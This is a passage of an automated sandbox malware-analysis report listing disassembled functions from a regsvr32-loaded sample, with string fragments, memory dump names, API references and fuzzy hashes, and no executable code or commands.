O,, xrefs: 005C4938
;, xrefs: 005C4BE0
fdu, xrefs: 005C4ACA

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;$O,$fdu
API String ID: 0-1721916326
Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
Instruction ID: 2d99b51b8bc77cd73b03623cd8b51780dd81995cc63b2c02b221a98764b184bf
Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
Instruction Fuzzy Hash: BBA1F271D14718EFDF58DFA8E8C999EBBB1FB54314F00421EE806A62A0CBB89945CF41

Uniqueness

Uniqueness Score: -1.00%

Function 005C3E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

u, xrefs: 005C3EF1
f, xrefs: 005C3E35
&v, xrefs: 005C3EC8

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u$&v$f
API String ID: 0-1868853588
Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
Instruction ID: d2ebbd461fedd956f35b05ce2ef42ad88612a11d016e3cd4445b94410a4286f0
Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
Instruction Fuzzy Hash: 3F713371D04709ABCB1CDFA8E5D959DBBB1FB48314F20852DE416A72A0CB749A45CF81

Uniqueness

Uniqueness Score: -1.00%

Function 005DE750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

o, xrefs: 005DE8F8
j, xrefs: 005DE86D
t, xrefs: 005DE908

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o$j$t
API String ID: 0-2067604139
Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
Instruction ID: bae13bb7f510129c1d806dc56a60735cc3409d04d99f07e453c1415aca7a6c36
Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
Instruction Fuzzy Hash: 6C61DE705087858BD368DF28C19A55FBBF1FBC6704F104A1EE68A9B2A0D77AD844CB43

Uniqueness

Uniqueness Score: -1.00%

Function 005DD5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

KGRa, xrefs: 005DD70C
wy, xrefs: 005DD66F
P, xrefs: 005DD6C4

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P$KGRa$wy
API String ID: 0-4077564265
Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
Instruction ID: b4ba5632c7dc5ab2bfe9b7406f2d05f3f7785e6a8356b33fdb30ac92d20ff939
Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
Instruction Fuzzy Hash: 7041C0B090074A8FDF48CF68C8965DE7FB0FB68348F51461DE84AA6290D37896A4CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 005D8BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON

Download Yara Rule

Strings

=, xrefs: 005D8D0C
`Y, xrefs: 005D8BCF
N@`Y, xrefs: 005D8C7D

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =$N@`Y$`Y
API String ID: 0-2183226064
Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
Instruction ID: ab83a9616239c84678850c6ce03ce516b1547989ee0868030b12e692e3ee3edd
Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
Instruction Fuzzy Hash: 1151D3B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 005DEAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

~?, xrefs: 005DEB85
'0, xrefs: 005DEBFD
\, xrefs: 005DEACC

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '0$~?$\
API String ID: 0-629757258
Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
Instruction ID: d69de6d845ec21e6b89e554f4a385ad5c144bdbfed71449bb5142a49d63c3beb
Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
Instruction Fuzzy Hash: E941CEB0548B818BE718CF28C59A51ABFF1FBC5344F604A2DF6968A3A0D774D885CF42

Uniqueness

Uniqueness Score: -1.00%

Function 005CDCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON

Download Yara Rule

Strings

~*b, xrefs: 005CDD03
z, xrefs: 005CDD83
A7, xrefs: 005CDD24

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A7$z$~*b
API String ID: 0-275545515
Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
Instruction ID: 0421a66dea1575b41f242c660d691a5dc6afa792cbc5a5ce21ec8941dc0e047f
Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
Instruction Fuzzy Hash: 4341C3B180074E8FDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 005CA7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON

Download Yara Rule

Strings

{,%, xrefs: 005CA85C
H, xrefs: 005CA8C6
rTk=, xrefs: 005CA831

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H$rTk=${,%
API String ID: 0-3174111592
Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
Instruction ID: 3766bd3b5509b9bef55f748ded42a6d2d1495b2b7f0a134cb24d88c6bde5a694
Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
Instruction Fuzzy Hash: 1E31E8705287859BD798DF28C4C991EBFE1FBC4354F906A1DF482862A0C779D445CB43

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 000000018000BAC7
RaiseException.KERNEL32 ref: 000000018000BAD8

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

ZwOpenSymbolicLinkObject.NTDLL ref: 0000000180010DBB
ZwOpenSymbolicLinkObject.NTDLL ref: 0000000180010DD3

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: LinkObjectOpenSymbolic
String ID:
API String ID: 3706036087-0
Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704

Uniqueness

Uniqueness Score: -1.00%

Function 005D3FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

D?", xrefs: 005D4246
8zfK, xrefs: 005D451B

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D?"$8zfK
API String ID: 0-617590365
Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
Instruction ID: 18175943f754d2b8441227a2142dc47de33ccbad606e6f472f329ffc44059fdd
Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
Instruction Fuzzy Hash: F412F1B550560DCBDB68DF38C48A49E3BE1FF58304F20512AFC269B2A2D774D964CB85

Uniqueness

Uniqueness Score: -1.00%

Function 005CC078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON

Download Yara Rule

Strings

h}, xrefs: 005CC778
#X, xrefs: 005CC564

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$h}
API String ID: 0-3021649463
Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
Instruction ID: 281eb8194a6eb53292e07ed15b4fff66269dca93772a7f9e91e21a11b0802d33
Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
Instruction Fuzzy Hash: EC2297709096888BEBF8DF64C889BD97BF0FF44704F90251ED84E9A650DB786645CF42

Uniqueness

Uniqueness Score: -1.00%

Function 005E9910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

#X, xrefs: 005E9941
+ <, xrefs: 005E9A2E

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$+ <
API String ID: 0-1007305072
Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
Instruction ID: 964ad8c860f6e7b8d76cede0b74c5e83354152c16921d318a2190a8b239c1773
Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
Instruction Fuzzy Hash: E20278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56

Uniqueness

Uniqueness Score: -1.00%

Function 005DB460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

Hc, xrefs: 005DB853
aYG, xrefs: 005DB648

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Hc$aYG
API String ID: 0-2147329803
Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
Instruction ID: dc11cc7e408a29117f4cdb80e7ee6d2f378a17c8b03e3b83efeae3b863349361
Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
Instruction Fuzzy Hash: 12D1F27550170DCBEB68CF28C58A59E3BE5FF54308F50412AFC1A862A5D7B8E815CB46

Uniqueness

Uniqueness Score: -1.00%

Function 005C33D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

Ip, xrefs: 005C3906
2/, xrefs: 005C3729

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ip$2/
API String ID: 0-2558650176
Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
Instruction ID: 07e83ba1f002a08fd508502cb8cc389456b62390f3a29bd4dba30ccfa101c3a5
Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
Instruction Fuzzy Hash: 66E1D371505B888FEBB8DF68CC89BEB7BA0FB84306F10551ED84A9E290DB745685CF41

Uniqueness

Uniqueness Score: -1.00%

Function 005C4214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

h, xrefs: 005C432B
j-`, xrefs: 005C444F

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: h$j-`
API String ID: 963392458-2572860821
Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
Instruction ID: 1e27322194b61f29dc864fc11a42f92c4d3a6d72689d8b6f73d5abcecd47170f
Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
Instruction Fuzzy Hash: FAC1F371904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB261DBB49845CF41

Uniqueness

Uniqueness Score: -1.00%

Function 005D6C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

#z, xrefs: 005D6FB0
UP, xrefs: 005D6CED

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$UP
API String ID: 0-3609392360
Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
Instruction ID: c0c5c6d2d8494d2f49901e020f247ea82bee087e0cc4b71e017c604506402bf3
Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
Instruction Fuzzy Hash: B4A1357190460ADBDF58DFA8E4CA49EBFB0FB64344F20451EE846A72A0CB749995CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 005E94BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON

Download Yara Rule

Strings

)bkr, xrefs: 005E95CD
z~, xrefs: 005E94EB

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )bkr$z~
API String ID: 0-4035444816
Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
Instruction ID: b8385847d9af51459ecf940d75afadeb93156b51902851d2c536a1cc823e28ef
Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
Instruction Fuzzy Hash: 208180715147C98FEBB8CF28CC8A7D93BA0FB45314F60851AD88DCA291DF785A49DB41

Uniqueness

Uniqueness Score: -1.00%

Function 005DEC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

aK>, xrefs: 005DEF0B
NM, xrefs: 005DEF7F

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: aK>$NM
API String ID: 0-1076587397
Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
Instruction ID: ce34ef4658b1f8ab8f611150c1eacc2abb95853eded7cdc8cf722a5e060e0374
Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
Instruction Fuzzy Hash: F1B144B590030DCFDB98CF28C18A98D7BB8FB55348F505129FC1E9A2A0E3B5E614CB46

Uniqueness

Uniqueness Score: -1.00%

Function 005D662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

GcX, xrefs: 005D6734
cy5X, xrefs: 005D69F9

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GcX$cy5X
API String ID: 0-3427037236
Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
Instruction ID: 3918f4c86ea6563d10e496a3329d24f082ab5f4cebfc2568ce11c3b1d9970632
Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
Instruction Fuzzy Hash: 39A1B9B0548388CBEBBEDF38C89A6D93BA9FB44704F50461AE85E8E250DF749745CB41

Uniqueness

Uniqueness Score: -1.00%

Function 005CAC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

U, xrefs: 005CAF25
&, xrefs: 005CAF3E

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &$U
API String ID: 0-326847644
Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
Instruction ID: d1f2589233e1fce65754de2d60f520b608946f7e589fbc2c75390a0b4340899b
Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
Instruction Fuzzy Hash: 419168B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19F866AA250D7B4D665CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005D5A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

k' {, xrefs: 005D5C91
z5, xrefs: 005D5C39

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: k' {$z5
API String ID: 0-3484172565
Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
Instruction ID: 305a5d9bb14ef31253be96740cbdecc0c59ba0e04dcc5f8d5597acbe3b602e64
Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
Instruction Fuzzy Hash: 3371E87050074A8FDB58DF28C88A5DA7BA1FB58358F11432AFC8AAB360D778D954CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 005CAAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

D, xrefs: 005CAC1C
6, xrefs: 005CAAEC

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6$D
API String ID: 0-3309211938
Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
Instruction ID: 168ebeb5456aa81a7cc6fdbdf8fa9bbbe749acda6cb88adfc189fb896c82c3e6
Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
Instruction Fuzzy Hash: C051387052478D9FDB98CF68DC89A993BA4FB05308F90626DFC46C7292C774D886CB41

Uniqueness

Uniqueness Score: -1.00%

Function 005C7530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

(Pv0, xrefs: 005C768B
#T, xrefs: 005C75B2

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #T$(Pv0
API String ID: 0-2531358951
Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
Instruction ID: 3403bcf0c00bad5625132725cd409397979500c01ce1183912adb1174d08f1c9
Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
Instruction Fuzzy Hash: BB513DB050030E8BDF58DF58C88A5DE3FA0FB68398F211619EC4A96694D378D995CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 005D3B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

%9, xrefs: 005D3BB8
$, xrefs: 005D3BFF

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$%9
API String ID: 0-3031553271
Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
Instruction ID: f7835fd0788c5af6ca38117010a98a02f9accb77a053f63613333b315a74e007
Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
Instruction Fuzzy Hash: D2411870618785ABD7A8DF1DC08962ABAE1FB88714F90592FB486C73A1C738C9448B43

Uniqueness

Uniqueness Score: -1.00%

Function 005CB07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

s=z, xrefs: 005CB235
gd, xrefs: 005CB208

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: gd$s=z
API String ID: 0-3301279615
Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
Instruction ID: a52e7bb6c75318f0536edc869b93e6a9767f235b29194c27229fa6a1ac4c4720
Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
Instruction Fuzzy Hash: F451E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C6138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

ke&Q, xrefs: 005C61EC
!oW!, xrefs: 005C62B0

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !oW!$ke&Q
API String ID: 0-419570616
Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
Instruction ID: 9e5e75af3379b843b53bb3dad38f1bd5591f007b2ce50dab8b2f8f7aa15b319a
Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
Instruction Fuzzy Hash: 2751D5B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 005C4758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

P, xrefs: 005C4886
?j|, xrefs: 005C47F0

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?j|$P
API String ID: 0-615948335
Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
Instruction ID: f958c2b3772e8face1ff7e10674c832d3a1e21a93a9c77a5e7c63ec578150e9a
Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
Instruction Fuzzy Hash: F041D3B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 005D5880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

aI, xrefs: 005D58CF
%, xrefs: 005D58E3

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %$aI
API String ID: 0-3604358270
Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
Instruction ID: db35de7e8960c0903d9ed6ed4998fba81f88aeaad49d629e2659c01ee0b4d387
Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
Instruction Fuzzy Hash: 4341C6B190038A8BCF48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84

Uniqueness

Uniqueness Score: -1.00%

Function 005D8A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

[, xrefs: 005D8AF9
j, xrefs: 005D8AB4

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: j$[
API String ID: 0-3696242357
Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
Instruction ID: 05cacc201a49763107a15df6ffedc9cc172bca0ccc00979eec6751eedbecfaca
